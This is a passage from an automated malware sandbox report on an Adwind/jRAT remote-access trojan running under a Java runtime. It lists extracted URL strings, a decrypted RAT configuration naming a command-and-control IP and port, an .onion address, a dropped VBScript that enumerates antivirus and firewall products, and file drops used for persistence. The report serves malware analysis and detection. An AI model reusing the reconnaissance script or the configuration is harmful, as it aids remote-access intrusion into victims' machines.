Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.mc/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.mg/tarif.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.mx/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.net.ge/policy_en.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.net.sa/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.net.sg/sub_policies_agreement/2ld.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.net.ua/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ni/dominios.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.pa/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.pr/index.asp?f=1
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.priv.at/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.pro/support_faq.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ps/registration/policy.html#reg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.py/faq_a.html#faq_b
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.rw/cgi-bin/policy.pl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.sc/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.sh/rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.sl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.st/html/policyrules/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.tg/nictg/index.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.tj/policy.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.tm/rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.tt/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.vi/Domain_Rules/body_domain_rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.vi/newdomainform.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.yu/pravilnik-e.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.norid.no/regelverk/index.en.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.norid.no/regelverk/vedlegg-b.en.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.norid.no/regelverk/vedlegg-c.en.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.norid.no/regelverk/vedlegg-d.en.html
Source: resources.jar.17.dr	String found in binary or memory: http://www.nue.et-inf.uni-siegen.de/~geuer-pollmann/#xpathFilter
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: java.exe	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismA
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
Source: default.jfc.17.dr, jfr.jar.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: default.jfc.17.dr, jfr.jar.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: jvm.dll.17.dr, default.jfc.17.dr, jfr.jar.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: default.jfc.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-errors
Source: default.jfc.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-exceptions
Source: default.jfc.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/file-io-threshold
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: default.jfc.17.dr, profile.jfc.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/socket-io-threshold
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.oracle.com/javafx/pulse/id
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: ssv.dll.17.dr	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/downloads/index.html
Source: Welcome.html.17.dr	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: jvm.dll.17.dr	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/C:
Source: rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties//
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/Y
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimitce
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimits
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth3
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit7
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitE
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit9
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: java.exe	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManagerh
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.pnina.ps
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.qatar.net.qa/services/virtual.htm
Source: java.exe	String found in binary or memory: http://www.quovadis.bm
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.quovadis.bm0
Source: java.exe	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.reg.uz/registerr.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.registrar.mw/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.registry.co.ug/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.rotld.ro/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.sbnic.net.sb/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.sispa.org.sz/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.soregistry.com/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.svnet.org.sv/svpolicy.html
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.telnic.org/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.thnic.co.th
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.twnic.net/english/dn/dn_07a.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.tznic.or.tz/index.php/domains.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.una.an/an_domreg/default.asp
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.unicode.org/Public/
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.unicode.org/Public/.
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.unicode.org/cldr/data/.
Source: THIRDPARTYLICENSEREADME-JAVAFX.txt.17.dr	String found in binary or memory: http://www.unicode.org/copyright.html
Source: THIRDPARTYLICENSEREADME-JAVAFX.txt.17.dr, THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.unicode.org/copyright.html.
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.unicode.org/reports/
Source: java.exe	String found in binary or memory: http://www.usertrust.com
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.usertrust.com1
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.usertrust.com1604
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.xfree86.org/)
Source: resources.jar.17.dr	String found in binary or memory: http://www.xmlsecurity.org/NS/#configuration
Source: resources.jar.17.dr	String found in binary or memory: http://www.xmlsecurity.org/experimental#
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.y.net.ye/services/domain_name.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.za.net/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.zadna.org.za/slds.html
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan
Source: rt.jar.17.dr, resources.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan-j
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan-j/faq.html
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/features/incremental
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/features/optimize
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/java
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/redirect
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/xsltc
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan/xsltc/java
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xalan:nodeset
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xslt
Source: rt.jar.17.dr	String found in binary or memory: http://xml.apache.org/xslt/java
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe	String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: java.exe, rt.jar.17.dr, deploy.jar.17.dr	String found in binary or memory: http://xml.org/sax/features/validation
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe	String found in binary or memory: http://xml.org/sax/properties/%
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/properties/declaration-handler
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/properties/dom-node
Source: rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: rt.jar.17.dr	String found in binary or memory: http://xmlns.oracle.com/webservices/jaxws-databinding
Source: deploy.jar.17.dr	String found in binary or memory: http://xyz.sun.com/
Source: deploy.jar.17.dr	String found in binary or memory: http://xyz.sun.com/ammo/index.html
Source: jfxrt.jar.17.dr, deploy.jar.17.dr, javaws.jar.17.dr	String found in binary or memory: https://
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: jfxrt.jar.17.dr	String found in binary or memory: https://grweb.ics.forth.gr/english/1617-B-2005.html
Source: deployJava1.dll.17.dr	String found in binary or memory: https://javadl-esd-secure.oracle.com/update/baseline.version%sSoftware
Source: npdeployJava1.dll.17.dr	String found in binary or memory: https://javadl-esd-secure.oracle.com/update/baseline.version%sURLOverridedocumentSoftware
Source: deploy.jar.17.dr	String found in binary or memory: https://javadl-esd-secure.oracle.com/update/securitypack.jar
Source: deployJava1.dll.17.dr	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL%s?BundleId=%s%s
Source: deployJava1.dll.17.dr	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL%s?BundleId=%surl%s%stmp1.8%s.0%s
Source: java.exe	String found in binary or memory: https://jrat.io
Source: java.exe	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, cacerts.17.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: deploy.jar.17.dr	String found in binary or memory: https://oracle.com
Source: deploy.jar.17.dr	String found in binary or memory: https://oracle.com/foo/xyz/index.html
Source: deploy.jar.17.dr	String found in binary or memory: https://oracle.com/foobar/xyz/index.html
Source: deploy.jar.17.dr	String found in binary or memory: https://oracle.com/xyz/foo/index.html
Source: jfxrt.jar.17.dr	String found in binary or memory: https://postlister.uninett.no/sympa/info/norid-diskusjon
Source: jfxrt.jar.17.dr	String found in binary or memory: https://register.pandi.or.id/
Source: deploy.dll.17.dr	String found in binary or memory: https://sjremetrics.java.comhttps://prop21visitoridreportsuiteidsuninstallstat
Source: java.exe	String found in binary or memory: https://vvrhhhnaijyj6s2m.onion.top/storage/cryptOutput/0.85281100
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.dot.vn/vnnic/vnnic/domainregistration.jsp
Source: deploy.jar.17.dr	String found in binary or memory: https://www.example.com/app.html
Source: deploy.jar.17.dr	String found in binary or memory: https://www.example.com/dir/
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.hkdnr.hk
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.nic.cd/domain/insertDomain_2.jsp?act=1
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.nic.es/site_ingles/ingles/dominios/index.html
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.nic.im/pdfs/imfaqs.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.nic.org.mt/dotmt/
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.nic.pe/InformeFinalComision.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www.register.bg/user/static/rules/en/index.html
Source: jfxrt.jar.17.dr	String found in binary or memory: https://www2.hkirc.hk/register/rules.jsp

Remote Access Functionality:

ADWIND Rat detected

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file

Detected QRat through its decrypted resources patterns

Show sources

Source: Java tracing	QRat decryption behavior: \x00\x1d/com/sylvans/winged/FoodSword602t\x00\x19criminal/26/BPf/VHe/i.TXPuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1f/com/parody/isodose/LagnaDuriont\x00\x10do2gb1eb149f6497t\x00\x19criminal/27/BPf/VHe/i.TXPuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1f/com/parody/bergamot/FraenaAxelt\x00\x1147\xc0\x808717n526225j1t\x00\x19criminal/28/BPf/VHe/i.TXPuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x14/com/sylvans/PierMkst\x00\x10i10c4g9001q22rh0t\x00\x16criminal/0/CA/tP/Cdf.kuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1b/com/sylvans/wilsome/AuxRhat\x00\x10c3f122c8h0200482t\x00\x19criminal/0/PJp/EJ/bQp.KeXuq\x00~\x00\x04\x
Source: Java tracing	QRat decryption behavior: \x00\x1b/com/parody/isodose/HwyDibsskyanintheskyqa.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1f/com/sylvans/winged/BayedDirhemt\x00\x10920p3n13l4012b78t\x00\x8ecriminal/0/w/manintheskymanintheskymanintheskymanintheskymanintheskymanintheskymmanintheskymanintheskymanintheskymanintheskyanintheskysa.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1c/com/parody/bergamot/AgyHackt\x00\x11e519g61c5\xc0\x805b13ddt\x00\x8ecriminal/0/w/manintheskymanintheskymanintheskymanintheskymanintheskymanintheskymmanintheskymanintheskymanintheskymanintheskyanintheskyfa.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1f/com/p
Source: Java tracing	QRat decryption behavior: \x00\x1d/com/parody/bergamot/CorylPktional/iiiiiiiiii.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x19/com/sylvans/MaskoiDermadt\x00\x10g31j1b3c422m5bejt\x00(criminal/22/operational/iiiiiiiiii.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1c/com/sylvans/winged/CrcTrialt\x00\x11e5e3q3\xc0\x802k601cij3t\x00(criminal/23/operational/iiiiiiiiii.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1c/com/sylvans/wilsome/LiinInct\x00\x1012a2174b3ac9656bt\x00(criminal/24/operational/iiiiiiiiii.classuq\x00~\x00\x04\x00\x00\x00\x02t\x00\x1d/com/parody/bergamot/DelhiMaxt\x00\x10ca090a3f2jeh15hpt\x00(criminal/25/operatio

Collects Antivirus and Firewall information (ADWIND Rat suspicion)

Show sources

Source: Java tracing	Executes: java.io.Writer.write(java.lang.String) on Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: Java tracing	Executes: java.io.Writer.write(java.lang.String) on Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext

Found Adwind RAT configuration as decrypted string

Show sources

Source: Java tracing

AdWind RAT configuration: {"NETWORK":[{"PORT":2112,"DNS":"95.141.43.202"}],"INSTALL":true,"MODULE_PATH":"Oj/doi/Sv.fJn","PLUGIN_FOLDER":"pZEcencXKYF","JRE_FOLDER":"oqGupG","JAR_FOLDER":"JWPPBIkYxgO","JAR_EXTENSION":"PNrLjx","ENCRYPT_KEY":"IijVIHJNTpxDusPYLvdcLtMBG","DELAY_INSTALL":2,"NICKNAME":"VAL","VMWARE":false,"PLUGIN_EXTENSION":"eKfXl","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"TDDKCVVBkyX","JAR_REGISTRY":"mUbvFtJqcGv","DELAY_CONNECT":2,"VBOX":false}

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl

Jump to dropped file

Drops PE files

Show sources

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr120.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll	Jump to dropped file
